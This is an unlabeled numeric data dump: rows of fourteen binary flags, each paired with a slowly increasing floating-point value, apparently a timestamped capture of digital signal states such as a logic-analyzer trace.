0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846044e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846068e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846120e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846140e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846168e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846192e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846268e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846320e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846340e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846368e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846392e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846468e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846520e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846540e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846568e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846592e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846644e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846720e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846768e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846792e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846820e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846920e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0846968e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0846992e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847020e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847044e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847068e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847120e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847140e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847168e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847192e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847268e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847320e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847340e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847368e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847396e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847468e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847520e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847544e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847572e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847644e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847720e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847744e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847772e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847820e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847920e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847944e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0847972e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0847996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848020e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848044e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848068e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848092e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848120e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848144e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848172e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848268e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848320e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848344e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848372e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848396e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848468e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848520e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848544e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848572e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0848596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0848620e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0848624e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,2.0973356e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.0973604e-02 1,1,1,1,0,1,0,0,0,1,0,1,0,1,2.0973636e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.0973656e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,1,2.0973972e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.0973996e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0974004e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.0974020e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0974044e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.0974068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0974092e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.0974120e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0974144e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.0974172e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0974196e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,2.0974220e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,2.0974244e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974252e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974272e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974292e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974320e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974344e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0974348e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0974372e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0974396e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974404e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974420e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974444e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0974452e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0974496e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0974520e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974528e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974548e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974572e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974596e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974620e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974644e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974668e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974696e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974720e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974772e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974796e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974844e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974868e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974920e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0974948e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0974996e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975020e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975044e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975068e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975092e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975120e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0975124e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0975172e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0975196e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975204e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975220e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975244e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975296e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975320e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975372e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975396e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975444e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975468e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975496e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975520e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975544e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975572e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975620e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975648e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0975652e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0975696e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0975720e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975728e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975772e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975796e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975844e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975868e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975896e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975920e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975944e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0975972e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0975996e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976020e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976044e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976068e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976092e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976120e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976148e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976172e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976220e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976244e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0976252e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0976268e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0976296e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,2.0976300e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976304e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976320e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976344e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976372e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976396e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976444e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976468e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976496e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976520e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976572e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976596e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976644e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976668e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976720e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976748e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976772e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976796e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976820e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976844e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976868e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976892e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976920e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976944e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0976972e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0976996e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977020e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977044e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977092e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977120e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977144e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977172e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977196e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977220e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977244e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0977252e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0977268e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0977292e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977300e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977320e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977344e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0977348e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0977396e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0977420e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977428e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977444e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977468e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977492e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977520e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977548e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977572e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977596e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977620e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977668e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977696e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977748e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977772e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977820e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977844e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977896e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977920e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977948e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0977972e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0977996e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978020e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978096e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0978100e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0978148e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0978172e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978180e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978220e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978244e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978296e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978320e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978348e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978372e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978396e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978420e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978444e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978468e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978492e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978516e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978540e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978568e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978592e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978620e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978644e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978668e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978692e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978716e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978740e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978768e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978792e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978820e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978844e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978868e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978916e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0978940e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0978996e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979020e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979068e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979092e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979144e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979168e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979192e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979220e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979244e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979268e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979292e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979316e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979368e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979392e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979444e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979468e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979516e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979540e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979596e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979620e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979644e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979668e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979692e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979716e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979740e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979768e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979792e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979820e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979844e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979868e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979892e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979916e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979940e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0979968e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0979992e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980020e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980044e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980068e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980092e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980116e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980140e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980168e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980192e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980220e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980244e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980268e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980292e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980316e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980340e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980368e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980392e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980420e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980444e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980468e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980492e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980516e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980540e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980568e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980592e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980620e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980644e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980668e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980692e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980716e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980792e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980816e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980836e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980896e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980916e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0980940e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0980996e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0981020e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0981044e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0981068e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0981088e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0981108e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0981132e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0981156e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0981180e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0981200e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0981224e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,2.0981244e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,2.0981268e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,2.0981300e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,2.0981324e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,2.1105324e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,1,2.1105536e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,2.1105540e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.1105556e-02 0,0,0,0,1,1,0,0,0,1,0,1,0,1,2.1105588e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.1105612e-02 0,0,0,0,1,1,0,0,0,1,0,0,1,1,2.1105960e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.1105992e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1106020e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.1106040e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1106064e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.1106084e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1106108e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.1106132e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1106156e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,1,2.1106176e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.1106196e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1106220e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1106244e-02 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1106268e-02 